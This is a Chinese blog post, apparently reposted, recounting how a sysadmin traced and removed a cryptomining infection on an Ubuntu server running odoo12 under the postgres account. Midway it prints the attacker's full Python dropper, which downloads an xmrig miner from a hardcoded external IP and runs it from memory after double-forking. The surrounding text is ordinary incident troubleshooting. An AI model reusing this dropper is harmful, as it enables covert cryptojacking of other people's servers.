操作系统: Ubuntu 16.04

之前部署完odoo12后就经常出现服务挂掉的情况,查看状态一般都是某某包缺失,然后各种安装包,重启服务,这次发现CPU占用达到399%,而且每次进程名称都是随机的,通过postgres用户执行,遂怀疑之前安装包的时候装了什么不好的东西,通过以下步骤排查:

1. 通过top命令查看进程

发现PID为2981的进程异常

2. 通过在进程目录下找执行的程序:

cd /cd/proc/2981
sudo ls -l exe

定位到执行文件所在目录/var/lib/postgressql

3. 定位到执行文件后,切换到执行文件所在目录删除可疑文件

cd /var/lib/postgresql
ls -la

一下就看到有若干可疑脚本文件和文件夹,将.ssh、.systemd-init、.bash_history都删除了。

4. kill异常进程

kill -9 2981

然后再使用top命令查看进程

世界暂时安静了。

后续:观察了一小会,发现问题依旧,又出了一个新进程占CPU399%了,于是继续排查。

1. 通过对异常进程定位,发现还是在之前的目录,但进入到目录,发现之前被删除的文件没有再出现,于是进入到子目录内查找,在以下目录发现新问题

首先,映入眼帘的是go.py文件,这太明显了,于是打开该文件,内容如下:

import os
import sys
import ctypes
import hashlib
import urllib2
import platformdef run_miner(binary):fd = ctypes.CDLL(None).syscall(319, "", 1)final_fd = open('/proc/self/fd/' + str(fd), 'wb')final_fd.write(binary)final_fd.close()fork1 = os.fork()print os.getpid()if 0 != fork1:os._exit(0)ctypes.CDLL(None).syscall(112)fork2 = os.fork()if 0 != fork2:os._exit(0)os.execl('/proc/self/fd/' + str(fd), '', '')def load_miner(url):try:response = urllib2.urlopen(url)binary = response.read()except:return Nonereturn binarydef get_sysinfo():_arch = ctypes.sizeof(ctypes.c_void_p) * 8if _arch is 64:_arch = 64elif _arch is 32:_arch = 32else:return Falsekernel_name = platform.system()if "linux" in kernel_name:_os_name = "linux"elif "win" in kernel_name:_os_name = "win"else:return Falsereturn _os_name, _archdef get_md5(binary):return hashlib.md5(binary).hexdigest()if __name__ == "__main__":os_name, arch = get_sysinfo()if os_name != "linux":sys.exit(0)miner_url = "http://185.193.125.38:8000/cyka/xmrig-" + archminer_md5 = ["fd4e61e02958b57b8446325b62efa1ea", "616b7f7f9a061fd8a90c83467e7139e0"]miner_max_retry = 10_dl_count = 1while True:miner_bin = load_miner(miner_url)if get_md5(miner_bin) in miner_md5 or miner_max_retry < _dl_count:break_dl_count = _dl_count + 1try:run_miner(miner_bin)except:pass

很明了了,应该就是它,删除该文件,然后kill掉异常进程,继续观察,一会后,问题依旧!!!!!


继续排查,还是在原来的目录下发现一个可执行文件,如下

这是可疑文件,删除之,欸,没任何反应。。。

rm -rf 删了没反应!!!

文件还是在!!!

怎么办???

没权限??

chmod赋个777

见鬼!

看着那个绿色的postgresq1眉头紧蹙,捶胸顿足,木有办法呢

十分钟过去了

二十分钟过去了

灵光一现,那后面不是l是1啊,这名字太好了,于是直接:

rm -rf postgresq1

删掉了!!!!!!!

赶紧kill异常进程,再观察,这次应该没问题了

再次后续。问题又来了!!!!!

若干时间后问题再现了,该删的都删了,还是能自动执行,查看了crontab任务、自启动项,都没有收获,几乎想放弃了,想到对方使用postgres账户执行,遂设置postgres账户密码,使用较强密码,然后再kill异常进程,过去40分钟了,这次没有再看到新的进程,谢天谢地!

转载于:https://www.cnblogs.com/lnkDel/p/11553741.html

服务器异常 随机名称的进程CPU资源占用过高相关推荐

  1. 关于使用WindowsUpdate 或 Windows 自动升级时碰到的 svchost.exe 进程 CPU 资源占用过高的问题的相关信息...

    当你使用 WindowsUpdate 或 Windows 自动升级的时候,可能会碰到 svchost.exe 进程CPU占用100%的现象.如果你的现象符合下面的相关症状,请安装一个补丁程序用于缓解这 ...

  2. java接口经常变动前端怎么办_Java进程故障排查(CPU资源占用高,接口响应超时,功能接口停滞等)...

    故障分析 # 导致系统不可用情况(频率较大): 1)代码中某个位置读取数据量较大,导致系统内存耗尽,进而出现Full GC次数过多,系统缓慢: 2)代码中有比较消耗CPU的操作,导致CPU过高,系统运 ...

  3. CPU负载占用过高,该如何排查问题呢?

    快过年了,最后两天的工作量相对来说少了很多,于是抽空学了一下Linux相关的基础命令. 才子白问:学了啥子东西,分享一下呗! 成子:学了基础的Linux命令,跟你分享,你听得懂嘛? 才子白:那我考考你 ...

  4. [组图教程]:8大方法!解决CPU资源占用100%[ZT]

    第1页:CPU资源占用100%:看驱动,看启动,看病毒      相信你的一定遇到过电脑动弹不得的时候,或许是只能眼看鼠标滑动而不能进行任何操作的时候,很多人都会经常遇到这样的问题:CPU占用率100 ...

  5. 9.7 top:实时显示系统中各个进程的资源占用状况

    top命令 用于实时地对系统处理器状态进行监控,它能够实时地显示系统中各个进程的资源占用状况.该命令可以按照CPU的使用.内存的使用和执行时间对系统任务进程进行排序显示,同时top命令还可以通过交互式 ...

  6. linux进程占用的资源,Linux查看进程的资源占用情况

    相关命令:who/w/ps/top 转载自:http://www.51testing.com/html/32/n-823532.html 1.top top命令是Linux下常用的性能分析工具,能够实 ...

  7. mysql 资源占用过高分析和解决方法

    mysql 资源占用过高分析和解决方法 参考文章: (1)mysql 资源占用过高分析和解决方法 (2)https://www.cnblogs.com/luoa/p/10422210.html 备忘一 ...

  8. lum使用cgi处理PHP,php-cgi进程占用cpu资源过多负载高的原因分析及解决步骤

    服务器环境:redhat linux 5.5 , nginx ,  phpfastcgi 在此环境下,一般php-cgi运行是非常稳定的,但也遇到过php-cgi占用太多cpu资源而导致服务器响应过慢 ...

  9. 服务器中木马病毒处理(CPU占用率很高)处理办法

    参考:https://blog.csdn.net/wkfyynh/article/details/105206990 记录一下这个过程,方便后来人使用.如果遇到权限问题,在所有执行命令前使用sudo ...

最新文章

  1. Python开发技巧:scrapy-redis爬虫如何发送POST请求
  2. CH - 0502 七夕祭(思维+中位数优化+前缀和优化)
  3. ruby中exec,system,%x的区别
  4. C++ 传递字符串数组给函数参数
  5. Leecode刷题热题HOT100(17)——电话号码的字母组合
  6. NodeJs开发框架fortjs
  7. Java中udp/tcp的发送和接收
  8. GitHub标星7700:Python从新手到大师,只要100天
  9. 深度学习2.0-9.tensorflow的高阶操作之填充与复制
  10. 软件工程--螺旋模型详解
  11. python 英语分词_Python实现中英文分词
  12. 服务器抓不到mrcp协议,MRCP协议
  13. verilog的时钟分频与时钟使能
  14. 树莓派2使用360wifi ,小米wifi
  15. 希尔顿逸林品牌聚焦亚太市场,推进全球扩张式发展
  16. 大前端CPU优化技术--NEON intrinsics进阶
  17. 帮做Java_代写Heuristics、代做SAT、代写Java语言设计、代做Java代做Prolog|帮做Haskell程序...
  18. windows环境下anaconda-navigaotr出现adding featured channels一直打不开的情况
  19. 封闭式基金周折价率排行表20061013(ZT)
  20. Linux手机蓝牙互传,Ubuntu和手机通过蓝牙互传文件[zt]

热门文章

  1. 优秀课程案例:使用Scratch制作扫雷插旗排雷完整版
  2. 一款 API 测试神器,非常强
  3. ​​【​观察】萨提亚为微软中国定下主基调 平台价值释放与生态伙伴共赢
  4. 最实用的网上赚钱方法:这个方法真的很实用哦!
  5. python白噪声检验结果查询_使用python实现时间序列白噪声检验方式
  6. STM32实战(1):搭建模板工程
  7. 2017总结与2018规划
  8. 未来链上跨境支付、融资领域龙头 Tribal 的发展与机遇
  9. RAKE(快速自动关键字抽取)算法原理与实现
  10. 拼点游戏(类似于田忌赛马)